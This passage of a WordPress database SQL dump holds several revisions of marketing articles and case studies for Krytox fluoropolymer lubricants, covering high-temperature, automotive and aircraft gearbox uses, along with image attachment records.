'Krytox XHT Takes the Heat', '', 'publish', 'closed', 'closed', '', 'krytox-xht-takes-heat', '', '', '2016-11-29 13:41:13', '2016-11-29 13:41:13', '', 0, 'https://www.miller-stephenson.com/?p=2375', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2376, 2, '2016-10-07 14:33:00', '2016-10-07 14:33:00', '', 'XHT', '', 'inherit', 'closed', 'closed', '', 'shutterstock_83285767', '', '', '2016-10-07 14:33:10', '2016-10-07 14:33:10', '', 2375, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_83285767.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2377, 2, '2016-10-07 14:36:11', '2016-10-07 14:36:11', '<strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox XHT</strong>\r\n\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n\r\n<strong>What are Krytox XHT lubricants?</strong>\r\n\r\nKrytox XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox the most robust family of lubricants available.\r\n\r\n<strong>SOLUTION: Krytox XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong>\r\n\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n\r\n<strong>PERFORMANCE: Krytox XHT—The lubricant for hot, hot, hot applications</strong>\r\n\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety\r\nis increased, because there is less time spent around hot equipment.\r\n\r\nKrytox XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Our categories" ]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here to learn more about Krytox XHT.</a>', 'Krytox XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-07 14:36:11', '2016-10-07 14:36:11', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2378, 2, '2016-10-07 14:36:39', '2016-10-07 14:36:39', '<strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox XHT</strong>\r\n\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n\r\n<strong>What are Krytox XHT lubricants?</strong>\r\n\r\nKrytox XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox the most robust family of lubricants available.\r\n\r\n<strong>SOLUTION: Krytox XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong>\r\n\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n\r\n<strong>PERFORMANCE: Krytox XHT—The lubricant for hot, hot, hot applications</strong>\r\n\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety\r\nis increased, because there is less time spent around hot equipment.\r\n\r\nKrytox XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox XHT" ]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox XHT.', 'Krytox XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-07 14:36:39', '2016-10-07 14:36:39', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2379, 2, '2016-10-07 14:37:33', '2016-10-07 14:37:33', '<p><strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox XHT</strong></p>\n<p>Conventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional<br />\nlubricant properties are often found inadequate for critical systems where failure is not an option.</p>\n<p>At the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.</p>\n<p>If re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of<br />\nlost production.</p>\n<p>Furthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.</p>\n<p><strong>What are Krytox XHT lubricants?</strong></p>\n<p>Krytox XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox the most robust family of lubricants available.</p>\n<p><strong>SOLUTION: Krytox XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong></p>\n<p>The extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.</p>\n<p>Krytox XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox, a standard lithium-thickened mineral oil was<br />\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four<br />\nmonths and look to be in excellent condition. Using Krytox has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.</p>\n<p>Krytox XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.</p>\n<p><strong>PERFORMANCE: Krytox XHT—The lubricant for hot, hot, hot applications</strong></p>\n<p>Increased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety<br />\nis increased, because there is less time spent around hot equipment.</p>\n<p>Krytox XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?</p>\n[ux_product_categories ids="115,116" number="10"]\n\n<p><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox XHT.</p>', 'Krytox XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-07 14:37:33', '2016-10-07 14:37:33', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2380, 2, '2016-10-07 14:38:05', '2016-10-07 14:38:05', '<strong>CHALLENGE: Overcoming high temperature lubricant degradation with Krytox XHT</strong>\r\n\r\nConventional lubricants are subject to oxidation, attack by harsh chemicals or solvents, flammability, and volatilization of the base oil, leading to failure of the lubrication system and associated hazards. Conventional\r\nlubricant properties are often found inadequate for critical systems where failure is not an option.\r\n\r\nAt the same time, conventional mineral oil lubricants begin to degrade quickly at temperatures above 93 °C (200 °F), and most alternative synthetic technologies begin to degrade quickly at temperatures above 149 °C (300 °F). When conventional oils and thickeners break down to form tars and solids that cause bearings to freeze up, frequent re-lubrication is required and component life is sacrificed. In fact, re-lubrication must occur more frequently as the temperature increases above 71 °C (160 °F). For every 10 °C (20 °F) increase in temperature, the life of the grease is cut in half, which can mean that re-lubrication is required every few hours at extreme temperatures.\r\n\r\nIf re-lubrication is missed for any reason, the equipment fails. Frequent re-lubrication, as well as frequent component outages, drive up maintenance materials and manpower cost, not to mention the substantial cost of\r\nlost production.\r\n\r\nFurthermore, recirculating oil systems are often employed to remove component heat. These can require 50x the lubricant volume of Krytox, resulting in housekeeping, disposal, and other environmental issues. A malfunction in the recirculating oil system can very quickly result in component bearing failure.\r\n\r\n<strong>What are Krytox XHT lubricants?</strong>\r\n\r\nKrytox XHT lubricants are made from Chemours proprietary fluoropolymer base oils and high performance thickeners. As with all Krytox lubricants, these products provide excellent lubrication properties and are chemically inert, thermally stable, nonflammable, and non-volatile, making Krytox the most robust family of lubricants available.\r\n\r\n<strong>SOLUTION: Krytox XHT lubricants take the heat and provide excellent lubrication in the harshest environments</strong>\r\n\r\nThe extra high temperature (XHT) line of fluoropolymer lubricants broadens the overall Krytox lubrication line to address long life lubrication needs from –74 °C (–100 °F) up to 399 °C (750 °F). Specifically, Krytox XHT greases are designed for applications in the 204–399 °C (400–750 °F) temperature range for use in bearings, gears, chains, O-rings, sliding, and other mechanical components. These products are excellent for use in many harsh industrial applications and are currently used in mining, metal processing, power generation, textile, aviation, baking, and chemical applications.\r\n\r\nKrytox XHT-AC grease was recently applied in a line of copper rod mill sizing bearings. These bearings run at temperatures of 204–260 °C (400–500 °F). Before Krytox, a standard lithium-thickened mineral oil was\r\napplied daily; the bearing life was typically 1–2 weeks. After applying Krytox XHT-AC grease, bearings have been running for over six months with no failures. The bearings were inspected and re-lubricated after four\r\nmonths and look to be in excellent condition. Using Krytox has resulted in substantial savings in man-hours and bearing replacement cost, as well as a significant increase in uptime.\r\n\r\nKrytox XHT-BDX was also applied to dampers in a power plant-fired boiler that control a 371 °C (700 °F) air stream. Graphite had been used previously, resulting in damper sticking and loss of control. Krytox XHT-BDX was installed in March 2000, and dampers have operated trouble free since that time. Krytox XHT-AC has been in use for 18 months in a waffle-baking oven bearing application at temperatures from 260–315 °C (500–600 °F). Krytox XHT-BDX is currently being used as an O-ring lubricant for aircraft environmental control systems. This system diverts engine exhaust to the wings for de-icing purposes. No other lubricant could withstand the 315°C (600 °F) temperatures of engine exhaust.\r\n\r\n<strong>PERFORMANCE: Krytox XHT—The lubricant for hot, hot, hot applications</strong>\r\n\r\nIncreased uptime and reduced maintenance costs lead to higher productivity. More reliable equipment with consistent performance reduces quality problems and waste. Unscheduled shutdowns are avoided and safety is increased, because there is less time spent around hot equipment.\r\n\r\nKrytox XHT lubricants are ideal for your high temperature lubrication systems. Besides the ability to work in harsh environments and high temperatures, Krytox XHT lubricants provide typical savings that are 10–100 times or more the cost of the lubricant. What are you waiting for?\r\n\r\n[ux_product_categories ids="115,116" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">Click here</a> to learn more about Krytox XHT.', 'Krytox XHT Takes the Heat', '', 'inherit', 'closed', 'closed', '', '2375-revision-v1', '', '', '2016-10-07 14:38:05', '2016-10-07 14:38:05', '', 2375, 'https://www.miller-stephenson.com/2375-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2381, 2, '2016-10-07 15:16:55', '2016-10-07 15:16:55', '<p><strong>Krytox Automotive Information &amp; Applications</strong></p>\n<p><strong>High Performance Lubricants That Work in Demanding Real-Life Applications</strong></p>\n<p>Reliable high-performance fluoropolymer lubricants from Chemours can stand up to even extreme conditions. Krytox oils and greases have proven scientific and technical properties to help solve the most critical issues in the automotive industry. Superior product performance, lower overall maintenance systems cost, and a lower environmental footprint help to meet rising consumer expectations. For automotive manufacturers, this provides the opportunity to offer extended warranties and enjoy improved productivity through reduced component failure.</p>\n<p>Krytox oils and greases are based on perfluoropolyether (PFPE) oils. These synthetic fluorinated lubricants are effective from –75 °C to greater than 400 °C (–103 °F to &gt;752 °F), depending upon operating conditions and product grade. Krytox oils and greases are exceptionally safe, reliable, and offer environmental benefits as well as longer lubricant life. These oils and greases will not burn or support combustion, even in 100% liquid or gaseous oxygen, nor will they degrade or break down in the presence of aggressive chemicals. In automotive applications, Krytox oils and greases deliver low temperature starting performance, while maintaining efficacy at higher temperatures. These oils and greases can increase service life of critical components, allowing them to run more quietly and last longer, for superior, reliable performance.</p>\n<p><strong>Vehicle Applications</strong></p>\n<p>See the illustration below for the many applications where Krytox has been proven effective. The non-bearing applications are shown in bold type.<img class="alignnone size-medium wp-image-2382" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-800x395.jpg" alt="automotive" width="800" height="395" /></p>\n<table width="703">\n<tbody>\n<tr>\n<td width="444">Krytox Oils and Greases</td>\n<td style="text-align: center;" width="103">Viscosity, cSt</td>\n<td style="text-align: center;" width="156">Temperature Range, °C</td>\n</tr>\n<tr>\n<td>GPL 104, GPL 204, GPL 214, GPL 224, GPL 294, GPL 2E4, XP2A4</td>\n<td style="text-align: center;">60</td>\n<td style="text-align: center;">–51–179</td>\n</tr>\n<tr>\n<td>AUT 1045, AUT 2E45, AUT 2245, AUT 2045, AUT 2A45</td>\n<td style="text-align: center;">100</td>\n<td style="text-align: center;">–40–200</td>\n</tr>\n<tr>\n<td>GPL 105, GPL 205, GPL 215, GPL 225, GPL 295, GPL 2E5, XP2A5, XP2C5</td>\n<td style="text-align: center;">160</td>\n<td style="text-align: center;">–36–210</td>\n</tr>\n</tbody>\n</table>\n<p><strong>Krytox Automotive Products for the Automotive Industry</strong></p>\n<p>Several grades of Krytox oil and grease are suitable for automotive use, depending on the application type and temperature range encountered. The table above lists the most common grades currently being used.</p>\n<p><strong>Proven Krytox Automotive Applications</strong></p>\n<p><strong>Battery Vent Seals</strong></p>\n<p>Lead acid batteries provide a dependable, rechargeable source of electricity for engine start-up. As the battery recharges, hydrogen gas is produced that is then safely released through sliding vents in the battery. These vents are designed to allow the release of gas pressure without the excessive evaporation of water. The ability of the vent to slide freely is crucial to ensuring the safe release of hydrogen pressure without compromising performance through excess water evaporation. Krytox lubricants have a very low coefficient of friction, leading to excellent control and smoother gliding of the vents. Furthermore, Krytox automotive products are compatible with the plastic in the battery housing and do not degrade in the corrosive, acidic environment of the battery.</p>\n<p><strong>Spark Plug Boots</strong></p>\n<p>The spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy. The boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox lubricants can prevent this fusion from taking place, and they are ideal in this application because they are stable non-reactive, and long-lasting. Krytox automotive lubricants can also withstand the high temperatures and energies of the spark plug environment.</p>\n<p><strong>Cooling System Thermostat</strong></p>\n<p>The automobile’s cooling system allows the engine to warm up quickly and also helps maintain its optimal operating temperature by removing heat as necessary. The system is controlled by a thermostat that determines whether coolant flows through the radiator (removing heat and allowing for optimal temperature maintenance) or is diverted back to the pump (allowing the engine to warm up more quickly). Coolant flow is controlled by a temperature-dependent valve (or thermostat) that either opens or closes, depending on need. The valve that allows coolant to flow through the radiator is opened by an actuator rod that must be able to slide without resistance. Increased friction reduces the thermostat’s ability to regulate an engine’s temperature and can result in longer warm-up time and higher engine temperatures, which will decrease performance and can lead to engine damage or failure. Proper lubrication of this rod with Krytox automotive high performance lubricant ensures long-term optimal engine performance and gas mileage.</p>\n<p><strong>O-Ring Lubrication/Assembly Lube</strong></p>\n<p>O-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade prematurely and cause serious damage. Krytox lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox lubricants do not contribute to seal degradation, because they do not oxidize and have greater temperature stability than the seals.</p>\n<p><strong>EGR Valve</strong></p>\n<p>The exhaust gas re-circulating (EGR) valve reduces NO x formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder, thus reducing the rate of NO x formation. If the valve does not open enough, insufficient re-circulation takes place, and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox automotive lubricants are an ideal choice, because they withstand the high temperatures and exhaust fumes experienced by the EGR valve.</p>\n<p><strong>Engine/Turbo Cooling System</strong></p>\n<p>Slip fittings and lubing assemblies are difficult to assemble and remove for maintenance or replacement. Krytox can solve the problem. Krytox products are compatible with most metal, plastic, and rubber interfaces, and they can reduce the friction in the assemblies, ultimately decreasing the time and effort needed to assemble parts. Furthermore, Krytox lubricants are long-lasting, ensuring that the parts will be much easier to disassemble and service throughout the lifetime of the vehicle.</p>\n<p><strong>Windshield Wiper Motor</strong></p>\n<p>Failure of the windshield wiper motor is a dangerous situation that can be avoided by the application of a small amount of Krytox on the bushings. Krytox has a very low coefficient of friction on startup, so a small amount leads to a significant reduction in friction. This translates into less work for the windshield wiper motor, giving it a much longer life.</p>\n<p><strong>Super Charger Lubricant</strong></p>\n<p>Krytox automotive grease is applied to a spring-loaded engineered plastic bushing to remove any backlash from the supercharger dual rotor drive train. The thermal and oxidative stability properties of Krytox lubricants, as well as their unique frictional characteristics, make them ideal for this type of application, delivering very long life and incredibly smooth, stick-slip free performance.</p>\n<p><strong>Exterior Side View Mirror Mechanism</strong></p>\n<p>The angle of the exterior side view mirror is adjusted using small plastic gears that can easily crack or break if even minor binding occurs. The application of Krytox grease provides long-lasting lubrication, eliminating the need for regular maintenance, and ensuring continuous, reliable operation of the mirror for the life of the vehicle.</p>\n<p><strong>Electronic Parking Brake Mechanism</strong></p>\n<p>Some vehicle manufacturers are replacing the conventional mechanical parking brake with an electronic one, where a simple push button assisted by a small plastic gearbox engages the brake. Failure of this mechanism could be serious. Krytox automotive greases and oils can carry the gear load, won’t evaporate or oxidize, and is compatible with all plastics. As a result of these excellent lubricant properties, it is expected to work for the lifetime of the car, and can reduce both safety issues and warranty claims.</p>\n<p><strong>Minivan Side Door Motor Clutch</strong></p>\n<p>This is an application requiring very specific frictional characteristics as well as performance over a long warranty life. Resistance to lubricant washout as well as tolerance to dirt are important lubricant characteristics. Krytox automotive greases and oils have once again excelled in performance in a unique and very challenging application, where traditional lubricants simply can’t meet the performance demands and extended warranty requirements.</p>\n[ux_product_categories ids="37,170,169,34" number="10"]\n\n<p>To learn more about Krytox Automotive lubricants <a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">click here.</a></p>', 'Krytox Lubrication Points for Non-Bearing Automotive Applications', '', 'publish', 'closed', 'closed', '', 'krytox-automotive', '', '', '2016-10-07 15:18:38', '2016-10-07 15:18:38', '', 0, 'https://www.miller-stephenson.com/?p=2381', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2382, 2, '2016-10-07 14:42:35', '2016-10-07 14:42:35', '', 'automotive', '', 'inherit', 'closed', 'closed', '', 'automotive-3', '', '', '2016-10-07 14:42:35', '2016-10-07 14:42:35', '', 2381, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2383, 1, '2016-10-07 14:43:45', '2016-10-07 14:43:45', '<p><strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong></p>\n<p><strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong></p>\n<p>Aircraft systems manufacturer improves flying experience with help from custom lubricant.</p>\n<p><strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong></p>\n<p>A systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.</p>\n<p><strong>The Challenge</strong></p>\n<p>The manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.</p>\n<p><strong>The Solution</strong></p>\n<p>Chemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\n<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\n<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\n</ul>\n<p>[product id="1072" columns="4"]</p>\n<p>To learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a></p>\n<p>&nbsp;</p>', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'inherit', 'closed', 'closed', '', '2311-revision-v1', '', '', '2016-10-07 14:43:45', '2016-10-07 14:43:45', '', 2311, 'https://www.miller-stephenson.com/2311-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2384, 1, '2016-10-07 14:48:43', '2016-10-07 14:48:43', '<p><strong>Krytox AGL 683 Aviation Gear Box Grease - Case Study</strong></p>\n<p><strong>Aircraft Cabin Air Conditioning and Temperature Control System Application</strong></p>\n<p>Aircraft systems manufacturer improves flying experience with help from custom lubricant.</p>\n<p><strong>Aircraft systems manufacturer makes cabins more comfortable and reduces costly maintenance</strong></p>\n<p>A systems manufacturer designed a cabin air conditioning and temperature control system for the latest series of large passenger aircraft that makes flying a more comfortable experience for passengers and flight crews. Compared to traditional systems, the new system provides higher humidity, improved air quality, lower cabin pressure, and less noise in the cabin.</p>\n<p><strong>The Challenge</strong></p>\n<p>The manufacturer needed a lubricant that could meet the demanding requirements of the electromechanical actuator gearbox in the control system. Specifically, the lubricant had to provide superior lubricity over an operating temperature ranging from –55–100 °C (–67–212 °F) and perform with very limited torque. In addition, the gearbox was required to operate for extended periods of time without re-lubrication.</p>\n<p><strong>The Solution</strong></p>\n<p>Chemours developed a new product specifically designed to meet the needs of the electro-mechanical actuator gearbox. Krytox AGL 683 grease can withstand the temperature extremes of the application and provide the lowest possible torque while delivering exceptional lubricity.</p>\n<p><strong>Key Advantages</strong></p>\n<ul>\n<li>Using Krytox AGL 683 lubricant, the aircraft systems manufacturer was able to extend lubrication intervals.</li>\n<li>Chemours has the knowledge to put science to work to develop a custom-designed lubricant that met the specific needs of this critical system.</li>\n<li>Krytox AGL 683 lubricant can be used for other electro-mechanical gearbox applications.</li>\n</ul>\n<p>[product id="1072" columns="6"]</p>\n<p>To learn more about Krytox AGL 683, please <a href="https://www.miller-stephenson.com/product/agl-683/">click here.</a></p>\n<p>&nbsp;</p>', 'Krytox AGL 683 Case Study - Gearbox Grease', '', 'inherit', 'closed', 'closed', '', '2311-revision-v1', '', '', '2016-10-07 14:48:43', '2016-10-07 14:48:43', '', 2311, 'https://www.miller-stephenson.com/2311-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2385, 51, '2016-10-07 14:57:37', '2016-10-07 14:57:37', '', '', '', 'publish', 'closed', 'closed', '', '2385', '', '', '2016-10-07 14:57:37', '2016-10-07 14:57:37', '', 0, 'https://www.miller-stephenson.com/nf_sub/2385/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (2386, 2, '2016-10-07 15:01:23', '2016-10-07 15:01:23', '', 'Krytox Automotive', '', 'inherit', 'closed', 'closed', '', 'shutterstock_442847356', '', '', '2016-10-07 15:02:08', '2016-10-07 15:02:08', '', 2381, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_442847356.jpg', 0, 'attachment', 'image/jpeg', 0); 
